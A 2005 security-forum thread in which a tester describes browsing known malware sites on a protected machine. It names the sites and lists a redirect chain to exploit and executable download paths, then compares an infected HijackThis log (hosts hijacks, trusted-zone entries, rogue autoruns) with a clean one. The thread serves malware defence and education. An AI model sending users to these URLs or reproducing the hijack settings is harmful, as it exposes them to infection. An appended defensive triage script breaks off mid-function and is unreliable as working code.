Where I have gone, what happened................

This forum is for testing I do with various security settings and tools: infection infiltration, security lock-down, among other things. Currently XP Home with SP2 installed.


TICTestBox
Site Admin
Posts: 245
Joined: Tue Apr 19, 2005 12:11 pm
Area Of Expertise: Infectious Malware
experience: I know the functions, OS settings, registry tweaks and more
Location: TeMerc's House


Postby TICTestBox » Mon May 02, 2005 11:51 pm

Ok, it's been over 2 weeks now since I started this experiment. So far, things are progressing as I had hoped.

I have gone to some sites which are known malware infestation sites, found by the likes of Webhelper.

These sites routinely run for 30 minutes loading up malwares, into the dozens of infections and hundreds of files. Below are a few of them.

***WARNING: DO NOT ATTEMPT TO GO TO THESE SITES UNLESS YOU'RE AN EXPERIENCED MALWARE FIGHTER AND FULLY PROTECTED TO BOOT***

008k.com : CWSI site
crackz.ws :New transponder site, providing the new Aurora infection.
600pics.com

From the recent Google misspelling scheme:
Googkle.com
Gooogle.com
XCNN.com

And a variety of other related misspellings of legit sites, which have been known to drop infections here and there.

And of course, every time I pick up a new site which is not yet listed in either IESPYAD or the MVPS hosts file, I go there too.

Thus far, the only thing that's happened was a minor attempted hijack and the Bube infection that wasn't.

So, at this point, I am very happy with what's transpired in this test and will continue for a while.

G3
Posts: 49
Joined: Fri Mar 11, 2005 10:42 pm

Postby G3 » Fri May 06, 2005 2:21 pm

Thanks for the updates on your testing. It certainly proves we need defense and a lot of it. At your advice, as part of your tests, I also downloaded and installed the free version of Diamond's ProcessGuard. It adds one more layer of defense (prevents hackers from terminating my software). Thanks for the tip.

JeanInMontana
Posts: 2570
Joined: Wed Feb 02, 2005 9:47 am
Gender: Female
experience: I know the functions, OS settings, registry tweaks and more
PC time: More than 4 hours a day
Location: South Central Montana USA

Postby JeanInMontana » Sat May 07, 2005 7:35 am

I know I have gotten much more cautious in how I spell Google since your escapades. It is so easy to make a typo and not see it until it is too late. I think I am well protected, but I don't want to find out with a typo that I'm not!


Postby TICTestBox » Mon May 09, 2005 12:10 pm

OK kids, went to a new site last night.

Yet another porn site (SURPRISE). It was found by Webhelper and promptly DLed all sorts of nasties for 20 minutes. This is the log he got with HJT after hitting the site:



Code:

Start at 700xxx.com/tgp.shtml
calls the following:
iframedollars.biz/dl/adv410.php
81.222.131.59/dl/adv410/x.chm
81.222.131.59/dl/adv410/sploit.anr
iframedollars.biz/dl/loadadv410.exe

HJT log
Logfile of HijackThis v1.99.1
Scan saved at 9:53:01 AM, on 5/8/2005
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\VMADD\VMSRVC.EXE
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\System32\VPCMap.exe
C:\WINDOWS\VMADD\VMUSrvc.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WinZip\WZQKPICK.EXE
C:\WINDOWS\System32\wuauclt.exe
C:\Program Files\Common Files\Symantec Shared\NMain.exe
C:\Program Files\Common Files\symantec shared\CCLGVIEW.EXE
C:\Program Files\Blighty Design\spade.exe
C:\WINDOWS\System32\cmd.exe
C:\WINDOWS\tool1.exe
C:\WINDOWS\System32\paytime.exe
C:\WINDOWS\stubinstaller5356.exe
C:\WINDOWS\shop1004.exe
c:\wp.exe
C:\WINDOWS\System32\Services\{B6B58591-DD53-4F2F-B968-B11F7D689929}\SVCHOST.EXE
C:\Program Files\Internet Optimizer\optimize.exe
C:\Program Files\Common Files\WinTools\WToolsA.exe
C:\Program Files\BullsEye Network\bin\bargains.exe
C:\Program Files\Common Files\WinTools\WSup.exe
C:\WINDOWS\System32\rsfmebuf.exe
C:\WINDOWS\System32\exdl1.exe
c:\windows\system32\mnklins.exe
c:\windows\system32\calc.exe
C:\WINDOWS\System32\senaint.exe
C:\Program Files\AutoUpdate\AutoUpdate.exe
C:\Program Files\Toolbar\TBPS.exe
C:\WINDOWS\System32\ap9h4qmo.exe
C:\PROGRA~1\Toolbar\PIB.exe
C:\DOCUME~1\pjordan\LOCALS~1\Temp\rs.exe
C:\Program Files\WebSiteViewer\124716.dlr
C:\program files\internet explorer\iexplore.exe
C:\PROGRA~1\Toolbar\TBPSSvc.exe
C:\Program Files\Common Files\WinTools\WToolsS.exe
C:\Documents and Settings\pjordan\Desktop\Utilities\HJT199_1\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://81.222.131.49/index.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.websearch.com/ie.aspx?tb_id=50162
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://81.222.131.49/index.php
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://81.222.131.49/index.php
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,SearchAssistant = http://www.websearch.com/ie.aspx?tb_id=50162
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,CustomizeSearch = res://C:\PROGRA~1\Toolbar\toolbar.dll/sa
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://81.222.131.49/index.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.websearch.com/ie.aspx?tb_id=50162
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = res://C:\PROGRA~1\Toolbar\toolbar.dll/sa
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://81.222.131.49/index.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://81.222.131.49/index.php
R3 - URLSearchHook: (no name) - _{CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)
O1 - Hosts: 127.0.0.3 n-glx.s-redirect.com
O1 - Hosts: 127.0.0.3 x.full-tgp.net
O1 - Hosts: 127.0.0.3 counter.sexmaniack.com
O1 - Hosts: 127.0.0.3 autoescrowpay.com
O1 - Hosts: 127.0.0.3 www.autoescrowpay.com
O1 - Hosts: 127.0.0.3 www.awmdabest.com
O1 - Hosts: 127.0.0.3 www.sexfiles.nu
O1 - Hosts: 127.0.0.3 awmdabest.com
O1 - Hosts: 127.0.0.3 sexfiles.nu
O1 - Hosts: 127.0.0.3 allforadult.com
O1 - Hosts: 127.0.0.3 www.allforadult.com
O1 - Hosts: 127.0.0.3 www.iframe.biz
O1 - Hosts: 127.0.0.3 iframe.biz
O1 - Hosts: 127.0.0.3 www.newiframe.biz
O1 - Hosts: 127.0.0.3 newiframe.biz
O1 - Hosts: 127.0.0.3 www.vesbiz.biz
O1 - Hosts: 127.0.0.3 vesbiz.biz
O1 - Hosts: 127.0.0.3 www.pizdato.biz
O1 - Hosts: 127.0.0.3 pizdato.biz
O1 - Hosts: 127.0.0.3 www.aaasexypics.com
O1 - Hosts: 127.0.0.3 aaasexypics.com
O1 - Hosts: 127.0.0.3 www.virgin-tgp.net
O1 - Hosts: 127.0.0.3 virgin-tgp.net
O1 - Hosts: 127.0.0.3 www.awmcash.biz
O1 - Hosts: 127.0.0.3 awmcash.biz
O1 - Hosts: 127.0.0.3 buldog-stats.com
O1 - Hosts: 127.0.0.3 www.buldog-stats.com
O1 - Hosts: 127.0.0.3 fregat.drocherway.com
O1 - Hosts: 127.0.0.3 slutmania.biz
O1 - Hosts: 127.0.0.3 www.slutmania.biz
O1 - Hosts: 127.0.0.3 toolbarpartner.com
O1 - Hosts: 127.0.0.3 www.toolbarpartner.com
O1 - Hosts: 127.0.0.3 www.megapornix.com
O1 - Hosts: 127.0.0.3 megapornix.com
O1 - Hosts: 127.0.0.3 www.sp2fucked.biz
O1 - Hosts: 127.0.0.3 sp2fucked.biz
O1 - Hosts: 127.0.0.3 greg-tut.com
O1 - Hosts: 127.0.0.3 www.greg-tut.com
O1 - Hosts: 127.0.0.3 nylonsexy.com
O1 - Hosts: 127.0.0.3 www.nylonsexy.com
O1 - Hosts: 127.0.0.3 vparivalka.com
O1 - Hosts: 127.0.0.3 www.vparivalka.com
O1 - Hosts: 127.0.0.3 iframeprofit.com
O1 - Hosts: 127.0.0.3 www.iframeprofit.com
O1 - Hosts: 127.0.0.3 topsearch10.com
O1 - Hosts: 127.0.0.3 www.topsearch10.com
O1 - Hosts: 127.0.0.3 statscash.biz
O1 - Hosts: 127.0.0.3 www.statscash.biz
O1 - Hosts: 127.0.0.3 vxiframe.biz
O1 - Hosts: 127.0.0.3 www.vxiframe.biz
O1 - Hosts: 127.0.0.3 crazy-toolbar.com
O1 - Hosts: 127.0.0.3 www.crazy-toolbar.com
O1 - Hosts: 127.0.0.3 topcash.biz
O1 - Hosts: 127.0.0.3 www.topcash.biz
O1 - Hosts: 127.0.0.3 loadcash.biz
O1 - Hosts: 127.0.0.3 www.loadcash.biz
O2 - BHO: BHObj Class - {00000010-6F7D-442C-93E3-4A4827C2E4C8} - C:\WINDOWS\nem220.dll
O2 - BHO: CeresObj Class - {00000049-8F91-4D9C-9573-F016E7626484} - C:\WINDOWS\ceres.dll
O2 - BHO: (no name) - {016235BE-59D4-4CEB-ADD5-E2378282A1D9} - C:\Program Files\CxtPls\cxtpls.dll
O2 - BHO: IE Update Class - {5B4AB8E2-6DC5-477A-B637-BF3C1A2E5993} - C:\WINDOWS\isrvs\sysupd.dll
O2 - BHO: (no name) - {87766247-311C-43B4-8499-3D5FEC94A183} - C:\PROGRA~1\COMMON~1\WinTools\WToolsB.dll
O2 - BHO: (no name) - {8952A998-1E7E-4716-B23D-3DBE03910972} - C:\PROGRA~1\Toolbar\toolbar.dll
O2 - BHO: Web assistant - {9ECB9560-04F9-4bbc-943D-298DDF1699E1} - C:\Program Files\Common Files\Symantec Shared\AdBlocking\NISShExt.dll
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton Internet Security\Norton AntiVirus\NavShExt.dll
O2 - BHO: ADP UrlCatcher Class - {F4E04583-354E-4076-BE7D-ED6A80FD66DA} - C:\WINDOWS\System32\msbe.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Web assistant - {0B53EAC3-8D69-4b9e-9B19-A37C9A5676A7} - C:\Program Files\Common Files\Symantec Shared\AdBlocking\NISShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton Internet Security\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: UCmore XP - The Search Accelerator - {44BE0690-5429-47f0-85BB-3FFD8020233E} - C:\Program Files\TheSearchAccelerator\UCMTSAIE.dll
O3 - Toolbar: &Search Toolbar - {339BB23F-A864-48C0-A59F-29EA915965EC} - C:\PROGRA~1\Toolbar\toolbar.dll
O4 - HKLM\..\Run: [VPCUserServices] C:\WINDOWS\VMADD\VMUSrvc.exe
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [IS CfgWiz] C:\Program Files\Common Files\Symantec Shared\cfgwiz.exe /GUID NIS /CMDLINE "REBOOT"
O4 - HKLM\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe
O4 - HKLM\..\Run: [SSC_UserPrompt] C:\Program Files\Common Files\Symantec Shared\Security Center\UsrPrmpt.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
O4 - HKLM\..\Run: [sunasDTServ] C:\Program Files\Sunbelt Software\CounterSpy Client\sunasDtServ.exe
O4 - HKLM\..\Run: [sunasServ] C:\Program Files\Sunbelt Software\CounterSpy Client\sunasServ.exe
O4 - HKLM\..\Run: [PayTime] C:\WINDOWS\System32\paytime.exe
O4 - HKLM\..\Run: [AutoLoaderAproposClient] "C:\WINDOWS\cxtpls_loader.exe" /HideUninstall /HideDir /PC=CP.AMS /ShowLegalNote=nonbranded
O4 - HKLM\..\Run: [Internet Optimizer] "C:\Program Files\Internet Optimizer\optimize.exe"
O4 - HKLM\..\Run: [Desktop Search] C:\WINDOWS\isrvs\desktop.exe
O4 - HKLM\..\Run: [Service Host] C:\WINDOWS\System32\Services\{B6B58591-DD53-4F2F-B968-B11F7D689929}\SVCHOST.EXE
O4 - HKLM\..\Run: [ffis] C:\WINDOWS\isrvs\ffisearch.exe
O4 - HKLM\..\Run: [BullsEye Network] C:\Program Files\BullsEye Network\bin\bargains.exe
O4 - HKLM\..\Run: [Disk Keeper] C:\WINDOWS\System32\Services\{B6B58591-DD53-4F2F-B968-B11F7D689929}\SECURITY.EXE
O4 - HKLM\..\Run: [WinTools] C:\PROGRA~1\COMMON~1\WinTools\WToolsA.exe
O4 - HKLM\..\Run: [mnklins] c:\windows\system32\mnklins.exe
O4 - HKLM\..\Run: [u33f3FX] senaint.exe
O4 - HKLM\..\Run: [ap9h4qmo] C:\WINDOWS\System32\ap9h4qmo.exe
O4 - HKLM\..\Run: [AutoUpdater] "C:\Program Files\AutoUpdate\AutoUpdate.exe"
O4 - HKLM\..\Run: [TBPS] C:\PROGRA~1\Toolbar\TBPS.exe
O4 - HKLM\..\Run: [Security iGuard] C:\Program Files\Security iGuard\Security iGuard.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [PayTime] C:\WINDOWS\System32\paytime.exe
O4 - HKCU\..\Run: [180ClientStubInstall] "C:\WINDOWS\stubinstaller5356.exe"
O4 - HKCU\..\Run: [f0spRPbnl] rsfmebuf.exe
O4 - HKCU\..\Run: [WindowsFY] c:\wp.exe
O4 - HKCU\..\Run: [Lous] C:\Documents and Settings\pjordan\Application Data\osse.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\WinZip\WZQKPICK.EXE
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\j2re1.4.2_06\bin\npjpi142_06.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\j2re1.4.2_06\bin\npjpi142_06.dll
O9 - Extra button: Microsoft AntiSpyware helper - {8E5CA8C9-2AAE-4645-AD33-2311C47EE19F} - (no file) (HKCU)
O9 - Extra 'Tools' menuitem: Microsoft AntiSpyware helper - {8E5CA8C9-2AAE-4645-AD33-2311C47EE19F} - (no file) (HKCU)
O15 - Trusted Zone: *.blazefind.com
O15 - Trusted Zone: *.clickspring.net
O15 - Trusted Zone: *.flingstone.com
O15 - Trusted Zone: *.mt-download.com
O15 - Trusted Zone: *.my-internet.info
O15 - Trusted Zone: *.searchbarcash.com
O15 - Trusted Zone: *.searchmiracle.com
O15 - Trusted Zone: *.skoobidoo.com
O15 - Trusted Zone: *.slotch.com
O15 - Trusted Zone: *.slotchbar.com
O15 - Trusted Zone: *.windupdates.com
O15 - Trusted Zone: *.xxxtoolbar.com
O15 - Trusted Zone: *.ysbweb.com
O15 - Trusted Zone: *.blazefind.com (HKLM)
O15 - Trusted Zone: *.clickspring.net (HKLM)
O15 - Trusted Zone: *.flingstone.com (HKLM)
O15 - Trusted Zone: *.mt-download.com (HKLM)
O15 - Trusted Zone: *.my-internet.info (HKLM)
O15 - Trusted Zone: *.searchbarcash.com (HKLM)
O15 - Trusted Zone: *.searchmiracle.com (HKLM)
O15 - Trusted Zone: *.skoobidoo.com (HKLM)
O15 - Trusted Zone: *.slotch.com (HKLM)
O15 - Trusted Zone: *.slotchbar.com (HKLM)
O15 - Trusted Zone: *.windupdates.com (HKLM)
O15 - Trusted Zone: *.xxxtoolbar.com (HKLM)
O15 - Trusted Zone: *.ysbweb.com (HKLM)
O15 - Trusted IP range: 81.222.131.59
O15 - Trusted IP range: 81.222.131.59 (HKLM)
O16 - DPF: {9EB320CE-BE1D-4304-A081-4B4665414BEF} (MediaTicketsInstaller Control) - http://www.mt-download.com/MediaTicketsInstaller.cab?refid=2732
O17 - HKLM\System\CCS\Services\Tcpip\..\{432CB0FF-2031-4DE2-BF67-4DE45645CEB6}: NameServer = 68.56.0.5,68.56.0.6
O17 - HKLM\System\CS1\Services\Tcpip\..\{432CB0FF-2031-4DE2-BF67-4DE45645CEB6}: NameServer = 68.56.0.5,68.56.0.6
O17 - HKLM\System\CS2\Services\Tcpip\..\{432CB0FF-2031-4DE2-BF67-4DE45645CEB6}: NameServer = 68.56.0.5,68.56.0.6
O18 - Protocol: tpro - {FF76A5DA-6158-4439-99FF-EDC1B3FE100C} - C:\PROGRA~1\Toolbar\toolbar.dll
O18 - Filter: text/html - {950238FB-C706-4791-8674-4D429F85897E} - C:\WINDOWS\isrvs\mfiltis.dll
O20 - Winlogon Notify: drct16 - C:\WINDOWS\SYSTEM32\drct16.dll
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Network Proxy (ccProxy) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: Norton AntiVirus Auto Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton Internet Security\Norton AntiVirus\navapsvc.exe
O23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton Internet Security\Norton AntiVirus\SAVScan.exe
O23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
O23 - Service: SymWMI Service (SymWSC) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
O23 - Service: WebSeach Toolbar support NT service (TBPSSvc) - Unknown owner - C:\PROGRA~1\Toolbar\TBPSSvc.exe
O23 - Service: WinTools for IE service (WinToolsSvc) - Unknown owner - C:\Program Files\Common Files\WinTools\WToolsS.exe
O23 - Service: ZESOFT - Unknown owner - C:\WINDOWS\zeta.exe


You can see that's quite some mess!!!

What did I get, you ask?

Well, I got several attempts at trojans wanting to DL, probably about a dozen or so, which were all caught by the Avast! scanner.

After running scans with AAW SE, Spybot and MS\AS, only 3 items were found:
tracking cookies :D

That's right, that was it, tracking cookies. Those and about 2500 temp files, not unusual though, that number. And I was clicking around for about 40 minutes.

And MY HJT log?

Code:

Logfile of HijackThis v1.99.1
Scan saved at 12:03:40 PM, on 5/9/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\AVPersonal\AVWUPSRV.EXE
C:\Program Files\ProcessGuard\dcsuserprot.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\PROGRA~1\BILLPS~1\WINPAT~1\WinPatrol.exe
C:\Program Files\Microsoft AntiSpyware\gcasServ.exe
C:\Program Files\ProcessGuard\pgaccount.exe
C:\Program Files\AVPersonal\AVSched32.EXE
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\Program Files\AVPersonal\AVGNT.EXE
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\PROGRA~1\PANICW~1\POP-UP~1\PSFree.exe
C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\ProcessGuard\procguard.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\SpywareGuard\sgmain.exe
C:\Program Files\Winwall\Winwall.exe
C:\Program Files\SpywareGuard\sgbhp.exe
C:\Program Files\Yahoo!\Messenger\YPager.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\AVPersonal\AVGUARD.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\HJT1991\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://temerc.com/phpBB2/
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
O2 - BHO: SpywareGuard Download Protection - {4A368E80-174F-4872-96B5-0B27DDD11DB2} - C:\Program Files\SpywareGuard\dlprotect.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [WinPatrol] "C:\PROGRA~1\BILLPS~1\WINPAT~1\WinPatrol.exe"
O4 - HKLM\..\Run: [gcasServ] "C:\Program Files\Microsoft AntiSpyware\gcasServ.exe"
O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"
O4 - HKLM\..\Run: [AVSCHED32] C:\Program Files\AVPersonal\AVSched32.EXE /min
O4 - HKLM\..\Run: [Zone Labs Client] C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
O4 - HKLM\..\Run: [AVGCtrl] C:\Program Files\AVPersonal\AVGNT.EXE /min
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [PopUpStopperFreeEdition] "C:\PROGRA~1\PANICW~1\POP-UP~1\PSFree.exe"
O4 - HKCU\..\Run: [Gadwin PrintScreen 2.6] C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe /nosplash
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\Program Files\Yahoo!\Messenger\ypager.exe" -quiet
O4 - Startup: SpywareGuard.lnk = C:\Program Files\SpywareGuard\sgmain.exe
O4 - Startup: Winwall Autostart.lnk = C:\Program Files\Winwall\Winwall.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar2.dll/cmsearch.html
O8 - Extra context menu item: Backward Links - res://c:\program files\google\GoogleToolbar2.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://c:\program files\google\GoogleToolbar2.dll/cmcache.html
O8 - Extra context menu item: Similar Pages - res://c:\program files\google\GoogleToolbar2.dll/cmsimilar.html
O8 - Extra context menu item: Translate into English - res://c:\program files\google\GoogleToolbar2.dll/cmtrans.html
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O16 - DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} (PCPitstop Utility) - http://www.pcpitstop.com/pcpitstop/PCPitStop.CAB
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=34738&clcid=0x409
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.com/v5consumer/V5Controls/en/x86/client/wuweb_site.cab?1111384862544
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai.net/7/840/537/2004061001/housecall.trendmicro.com/housecall/xscan53.cab
O16 - DPF: {77E32299-629F-43C6-AB77-6A1E6D7663F6} (Groove Control) - http://www.nick.com/common/groove/gx/GrooveAX27.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
O23 - Service: AntiVir Service (AntiVirService) - H+BEDV Datentechnik GmbH - C:\Program Files\AVPersonal\AVGUARD.EXE
O23 - Service: AntiVir Update (AVWUpSrv) - H+BEDV Datentechnik GmbH, Germany - C:\Program Files\AVPersonal\AVWUPSRV.EXE
O23 - Service: DiamondCS Process Guard Service v3.000 (DCSPGSRV) - DiamondCS - C:\Program Files\ProcessGuard\dcsuserprot.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe


That's quite some difference, huh??

Take this !*!* spyware!

And this FU

You're not getting into my box!!!!


MUAHHAHAHAAHAHHAAAA

Until next time, when I'm at the pc, searching for nasties.

Tom
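The two logs above differ in a handful of entry types, and those are what a helper would look for first. An added triage script (my own example, not code from the thread or from HijackThis) that flags those entry types, run over a constructed subset of the lines posted above:

```python
"""Triage of HijackThis (HJT) log lines.

Added example, not from the thread or from HJT. It flags the entry types
that separate the infected log from the clean one: R0/R1 pages set to raw
IP URLs, O1 Hosts lines that redirect to anything but the normal loopback
or null address, O4 autoruns with random-looking names, no path, or a
drive/Windows-root location, O15 Trusted Zone / Trusted IP entries, O18
MIME filters, O20 Winlogon Notify DLLs and O23 services of unknown owner.
These are heuristics: review every hit and expect the odd false positive.
"""
import re

ENTRY_RE = re.compile(r"^(R\d|O\d+|F\d)\s+-\s+(.*)$")
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I)
AUTORUN_RE = re.compile(r"\[(.*?)\]\s*(.*)")
SINKHOLE_ADDRS = {"127.0.0.1", "0.0.0.0"}  # legitimate hosts-file blocking

# Constructed sample: a subset of lines from the two logs in the thread.
SAMPLE_LOG = r"""
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://81.222.131.49/index.php
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://temerc.com/phpBB2/
O1 - Hosts: 127.0.0.3 n-glx.s-redirect.com
O4 - HKLM\..\Run: [ap9h4qmo] C:\WINDOWS\System32\ap9h4qmo.exe
O4 - HKLM\..\Run: [u33f3FX] senaint.exe
O4 - HKLM\..\Run: [Zone Labs Client] C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
O4 - HKCU\..\Run: [WindowsFY] c:\wp.exe
O15 - Trusted Zone: *.blazefind.com
O15 - Trusted IP range: 81.222.131.59 (HKLM)
O20 - Winlogon Notify: drct16 - C:\WINDOWS\SYSTEM32\drct16.dll
O23 - Service: ZESOFT - Unknown owner - C:\WINDOWS\zeta.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe
"""


def _random_looking(name: str) -> bool:
    """Heuristic: 6+ alphanumerics mixing letters and digits (e.g. ap9h4qmo)."""
    return (re.fullmatch(r"[a-z0-9]{6,}", name, re.I) is not None
            and any(c.isdigit() for c in name)
            and any(c.isalpha() for c in name))


def _exe_path(cmd: str) -> str:
    """Pull the executable path out of an O4 command line (quoted or not)."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd[1:cmd.find('"', 1)]
    m = re.match(r"(.*?\.exe)", cmd, re.I)
    return m.group(1) if m else cmd.split()[0]


def triage_line(line: str):
    """Return (section, reason) for a suspicious HJT line, else None."""
    m = ENTRY_RE.match(line.strip())
    if not m:
        return None
    section, body = m.groups()
    if section in ("R0", "R1") and RAW_IP_URL.search(body):
        return section, "browser page points at a raw IP address"
    if section == "O1":
        parts = body.split()  # ['Hosts:', ip, hostname]
        if len(parts) >= 3 and parts[1] not in SINKHOLE_ADDRS:
            return section, f"hosts file sends {parts[2]} to {parts[1]}"
    if section == "O4":
        am = AUTORUN_RE.search(body)
        if am:
            name, path = am.group(1), _exe_path(am.group(2))
            if "\\" not in path:
                return section, f"autorun {path} has no path (search-path lookup)"
            parent = path.rsplit("\\", 1)[0].lower()
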